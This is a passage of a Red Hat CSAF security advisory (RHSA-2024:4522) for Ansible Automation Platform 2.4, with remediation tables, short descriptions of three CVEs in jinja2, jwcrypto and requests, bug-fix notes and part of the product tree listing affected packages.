| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4:ansible-test-1:2.15.12-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.aarch64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.ppc64le | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.s390x | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.src | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.x86_64 | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4:automation-controller-cli-0:4.5.8-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4:automation-controller-server-0:4.5.8-1.el9ap.noarch | — |
Workaround
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4:automation-controller-ui-0:4.5.8-1.el9ap.noarch | — |
Workaround
|
An incorrect control flow implementation vulnerability was found in Requests. If the first request in a session is made with verify=False, all subsequent requests to the same host will continue to ignore cert verification.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.x86_64 | — |
Vendor Fix
fix
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el8ap.noarch | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el8ap.src | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-test-1:2.15.12-1.el8ap.noarch | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.aarch64 | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.ppc64le | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.s390x | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.src | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.x86_64 | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-cli-0:4.5.8-1.el8ap.noarch | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-server-0:4.5.8-1.el8ap.noarch | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-ui-0:4.5.8-1.el8ap.noarch | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el8ap.noarch | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el8ap.src | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-test-1:2.15.12-1.el8ap.noarch | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.aarch64 | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.ppc64le | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.s390x | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.src | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.x86_64 | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el8ap.noarch | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el8ap.src | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4:ansible-test-1:2.15.12-1.el8ap.noarch | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.aarch64 | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.ppc64le | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.s390x | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.src | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.x86_64 | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4:automation-controller-cli-0:4.5.8-1.el8ap.noarch | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4:automation-controller-server-0:4.5.8-1.el8ap.noarch | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4:automation-controller-ui-0:4.5.8-1.el8ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el9ap.src | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-test-1:2.15.12-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.aarch64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.ppc64le | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.s390x | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.src | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.x86_64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-cli-0:4.5.8-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-server-0:4.5.8-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-ui-0:4.5.8-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el9ap.src | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-test-1:2.15.12-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.aarch64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.ppc64le | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.s390x | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.src | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.x86_64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el9ap.src | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4:ansible-test-1:2.15.12-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.aarch64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.ppc64le | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.s390x | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.src | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.x86_64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4:automation-controller-cli-0:4.5.8-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4:automation-controller-server-0:4.5.8-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4:automation-controller-ui-0:4.5.8-1.el9ap.noarch | — |
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Moderate"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "An update is now available for Red Hat Ansible Automation Platform 2.4\n\nRed Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.",
"title": "Topic"
},
{
"category": "general",
"text": "Red Hat Ansible Automation Platform provides an enterprise framework for building, deploying and managing IT automation at scale. IT Managers can provide top-down guidelines on how automation is applied to individual teams, while automation developers retain the freedom to write tasks that leverage existing knowledge without the overhead. Ansible Automation Platform makes it possible for users across an organization to share, vet, and manage automation content by means of a simple, powerful, and agentless language.\n\nSecurity Fix(es):\n\n* automation-controller: jinja2: accepts keys containing non-attribute characters (CVE-2024-34064)\n* automation-controller: jwcrypto: malicious JWE token can cause denial of service (CVE-2024-28102)\n* automation-controller: requests: subsequent requests to the same host ignore cert verification (CVE-2024-35195)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.\n\nUpdates and fixes for automation controller:\n* Fixed a bug where the controller does not respect \"DATABASES[\u2018OPTIONS\u2019]\" setting, if specified (AAP-26398)\n* Changed all uses of \"ImplicitRoleField\" to perform an \"on_delete=SET_NULL\" (AAP-25136)\n* Fixed the HostMetric automated counter to display the correct values (AAP-25115)\n* Added Django logout redirects (AAP-24543)\n* automation-controller has been updated to 4.5.8\n\nAdditional changes:\n* aap-metrics-utility has been updated to 0.3.0 (AAP-25875)\n* ansible-core has been updated to 2.15.12 (AAP-25536)",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2024:4522",
"url": "https://access.redhat.com/errata/RHSA-2024:4522"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/#moderate",
"url": "https://access.redhat.com/security/updates/classification/#moderate"
},
{
"category": "external",
"summary": "2268758",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2268758"
},
{
"category": "external",
"summary": "2279476",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2279476"
},
{
"category": "external",
"summary": "2282114",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2282114"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_4522.json"
}
],
"title": "Red Hat Security Advisory: Red Hat Ansible Automation Platform 2.4 Product Security and Bug Fix Update",
"tracking": {
"current_release_date": "2024-12-17T20:57:16+00:00",
"generator": {
"date": "2024-12-17T20:57:16+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.2.3"
}
},
"id": "RHSA-2024:4522",
"initial_release_date": "2024-07-12T01:43:40+00:00",
"revision_history": [
{
"date": "2024-07-12T01:43:40+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2024-07-12T01:43:40+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2024-12-17T20:57:16+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product": {
"name": "Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:ansible_automation_platform:2.4::el9"
}
}
},
{
"category": "product_name",
"name": "Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product": {
"name": "Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4-Inside-1.2",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:ansible_automation_platform_inside:2.4::el9"
}
}
},
{
"category": "product_name",
"name": "Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product": {
"name": "Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4-Developer-1.1",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:ansible_automation_platform_developer:2.4::el9"
}
}
},
{
"category": "product_name",
"name": "Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product": {
"name": "Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:ansible_automation_platform:2.4::el8"
}
}
},
{
"category": "product_name",
"name": "Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product": {
"name": "Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4-Inside-1.2",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:ansible_automation_platform_inside:2.4::el8"
}
}
},
{
"category": "product_name",
"name": "Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product": {
"name": "Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4-Developer-1.1",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:ansible_automation_platform_developer:2.4::el8"
}
}
}
],
"category": "product_family",
"name": "Red Hat Ansible Automation Platform"
},
{
"branches": [
{
"category": "product_version",
"name": "ansible-core-1:2.15.12-1.el9ap.src",
"product": {
"name": "ansible-core-1:2.15.12-1.el9ap.src",
"product_id": "ansible-core-1:2.15.12-1.el9ap.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ansible-core@2.15.12-1.el9ap?arch=src\u0026epoch=1"
}
}
},
{
"category": "product_version",
"name": "aap-metrics-utility-0:0.3.0-1.el9ap.src",
"product": {
"name": "aap-metrics-utility-0:0.3.0-1.el9ap.src",
"product_id": "aap-metrics-utility-0:0.3.0-1.el9ap.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/aap-metrics-utility@0.3.0-1.el9ap?arch=src"
}
}
},
{
"category": "product_version",
"name": "automation-controller-0:4.5.8-1.el9ap.src",
"product": {
"name": "automation-controller-0:4.5.8-1.el9ap.src",
"product_id": "automation-controller-0:4.5.8-1.el9ap.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller@4.5.8-1.el9ap?arch=src"
}
}
},
{
"category": "product_version",
"name": "ansible-core-1:2.15.12-1.el8ap.src",
"product": {
"name": "ansible-core-1:2.15.12-1.el8ap.src",
"product_id": "ansible-core-1:2.15.12-1.el8ap.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ansible-core@2.15.12-1.el8ap?arch=src\u0026epoch=1"
}
}
},
{
"category": "product_version",
"name": "aap-metrics-utility-0:0.3.0-1.el8ap.src",
"product": {
"name": "aap-metrics-utility-0:0.3.0-1.el8ap.src",
"product_id": "aap-metrics-utility-0:0.3.0-1.el8ap.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/aap-metrics-utility@0.3.0-1.el8ap?arch=src"
}
}
},
{
"category": "product_version",
"name": "automation-controller-0:4.5.8-1.el8ap.src",
"product": {
"name": "automation-controller-0:4.5.8-1.el8ap.src",
"product_id": "automation-controller-0:4.5.8-1.el8ap.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller@4.5.8-1.el8ap?arch=src"
}
}
}
],
"category": "architecture",
"name": "src"
},
{
"branches": [
{
"category": "product_version",
"name": "ansible-core-1:2.15.12-1.el9ap.noarch",
"product": {
"name": "ansible-core-1:2.15.12-1.el9ap.noarch",
"product_id": "ansible-core-1:2.15.12-1.el9ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ansible-core@2.15.12-1.el9ap?arch=noarch\u0026epoch=1"
}
}
},
{
"category": "product_version",
"name": "ansible-test-1:2.15.12-1.el9ap.noarch",
"product": {
"name": "ansible-test-1:2.15.12-1.el9ap.noarch",
"product_id": "ansible-test-1:2.15.12-1.el9ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ansible-test@2.15.12-1.el9ap?arch=noarch\u0026epoch=1"
}
}
},
{
"category": "product_version",
"name": "automation-controller-cli-0:4.5.8-1.el9ap.noarch",
"product": {
"name": "automation-controller-cli-0:4.5.8-1.el9ap.noarch",
"product_id": "automation-controller-cli-0:4.5.8-1.el9ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller-cli@4.5.8-1.el9ap?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "automation-controller-server-0:4.5.8-1.el9ap.noarch",
"product": {
"name": "automation-controller-server-0:4.5.8-1.el9ap.noarch",
"product_id": "automation-controller-server-0:4.5.8-1.el9ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller-server@4.5.8-1.el9ap?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "automation-controller-ui-0:4.5.8-1.el9ap.noarch",
"product": {
"name": "automation-controller-ui-0:4.5.8-1.el9ap.noarch",
"product_id": "automation-controller-ui-0:4.5.8-1.el9ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller-ui@4.5.8-1.el9ap?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "ansible-core-1:2.15.12-1.el8ap.noarch",
"product": {
"name": "ansible-core-1:2.15.12-1.el8ap.noarch",
"product_id": "ansible-core-1:2.15.12-1.el8ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ansible-core@2.15.12-1.el8ap?arch=noarch\u0026epoch=1"
}
}
},
{
"category": "product_version",
"name": "ansible-test-1:2.15.12-1.el8ap.noarch",
"product": {
"name": "ansible-test-1:2.15.12-1.el8ap.noarch",
"product_id": "ansible-test-1:2.15.12-1.el8ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ansible-test@2.15.12-1.el8ap?arch=noarch\u0026epoch=1"
}
}
},
{
"category": "product_version",
"name": "automation-controller-cli-0:4.5.8-1.el8ap.noarch",
"product": {
"name": "automation-controller-cli-0:4.5.8-1.el8ap.noarch",
"product_id": "automation-controller-cli-0:4.5.8-1.el8ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller-cli@4.5.8-1.el8ap?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "automation-controller-server-0:4.5.8-1.el8ap.noarch",
"product": {
"name": "automation-controller-server-0:4.5.8-1.el8ap.noarch",
"product_id": "automation-controller-server-0:4.5.8-1.el8ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller-server@4.5.8-1.el8ap?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "automation-controller-ui-0:4.5.8-1.el8ap.noarch",
"product": {
"name": "automation-controller-ui-0:4.5.8-1.el8ap.noarch",
"product_id": "automation-controller-ui-0:4.5.8-1.el8ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller-ui@4.5.8-1.el8ap?arch=noarch"
}
}
}
],
"category": "architecture",
"name": "noarch"
},
{
"branches": [
{
"category": "product_version",
"name": "aap-metrics-utility-0:0.3.0-1.el9ap.x86_64",
"product": {
"name": "aap-metrics-utility-0:0.3.0-1.el9ap.x86_64",
"product_id": "aap-metrics-utility-0:0.3.0-1.el9ap.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/aap-metrics-utility@0.3.0-1.el9ap?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "automation-controller-0:4.5.8-1.el9ap.x86_64",
"product": {
"name": "automation-controller-0:4.5.8-1.el9ap.x86_64",
"product_id": "automation-controller-0:4.5.8-1.el9ap.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller@4.5.8-1.el9ap?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "automation-controller-venv-tower-0:4.5.8-1.el9ap.x86_64",
"product": {
"name": "automation-controller-venv-tower-0:4.5.8-1.el9ap.x86_64",
"product_id": "automation-controller-venv-tower-0:4.5.8-1.el9ap.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller-venv-tower@4.5.8-1.el9ap?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "aap-metrics-utility-0:0.3.0-1.el8ap.x86_64",
"product": {
"name": "aap-metrics-utility-0:0.3.0-1.el8ap.x86_64",
"product_id": "aap-metrics-utility-0:0.3.0-1.el8ap.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/aap-metrics-utility@0.3.0-1.el8ap?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "automation-controller-0:4.5.8-1.el8ap.x86_64",
"product": {
"name": "automation-controller-0:4.5.8-1.el8ap.x86_64",
"product_id": "automation-controller-0:4.5.8-1.el8ap.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller@4.5.8-1.el8ap?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "automation-controller-venv-tower-0:4.5.8-1.el8ap.x86_64",
"product": {
"name": "automation-controller-venv-tower-0:4.5.8-1.el8ap.x86_64",
"product_id": "automation-controller-venv-tower-0:4.5.8-1.el8ap.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller-venv-tower@4.5.8-1.el8ap?arch=x86_64"
}
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_version",
"name": "aap-metrics-utility-0:0.3.0-1.el9ap.ppc64le",
"product": {
"name": "aap-metrics-utility-0:0.3.0-1.el9ap.ppc64le",
"product_id": "aap-metrics-utility-0:0.3.0-1.el9ap.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/aap-metrics-utility@0.3.0-1.el9ap?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "automation-controller-0:4.5.8-1.el9ap.ppc64le",
"product": {
"name": "automation-controller-0:4.5.8-1.el9ap.ppc64le",
"product_id": "automation-controller-0:4.5.8-1.el9ap.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller@4.5.8-1.el9ap?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "automation-controller-venv-tower-0:4.5.8-1.el9ap.ppc64le",
"product": {
"name": "automation-controller-venv-tower-0:4.5.8-1.el9ap.ppc64le",
"product_id": "automation-controller-venv-tower-0:4.5.8-1.el9ap.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller-venv-tower@4.5.8-1.el9ap?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "aap-metrics-utility-0:0.3.0-1.el8ap.ppc64le",
"product": {
"name": "aap-metrics-utility-0:0.3.0-1.el8ap.ppc64le",
"product_id": "aap-metrics-utility-0:0.3.0-1.el8ap.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/aap-metrics-utility@0.3.0-1.el8ap?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "automation-controller-0:4.5.8-1.el8ap.ppc64le",
"product": {
"name": "automation-controller-0:4.5.8-1.el8ap.ppc64le",
"product_id": "automation-controller-0:4.5.8-1.el8ap.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller@4.5.8-1.el8ap?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "automation-controller-venv-tower-0:4.5.8-1.el8ap.ppc64le",
"product": {
"name": "automation-controller-venv-tower-0:4.5.8-1.el8ap.ppc64le",
"product_id": "automation-controller-venv-tower-0:4.5.8-1.el8ap.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller-venv-tower@4.5.8-1.el8ap?arch=ppc64le"
}
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "aap-metrics-utility-0:0.3.0-1.el9ap.s390x",
"product": {
"name": "aap-metrics-utility-0:0.3.0-1.el9ap.s390x",
"product_id": "aap-metrics-utility-0:0.3.0-1.el9ap.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/aap-metrics-utility@0.3.0-1.el9ap?arch=s390x"
}
}
},
{
"category": "product_version",
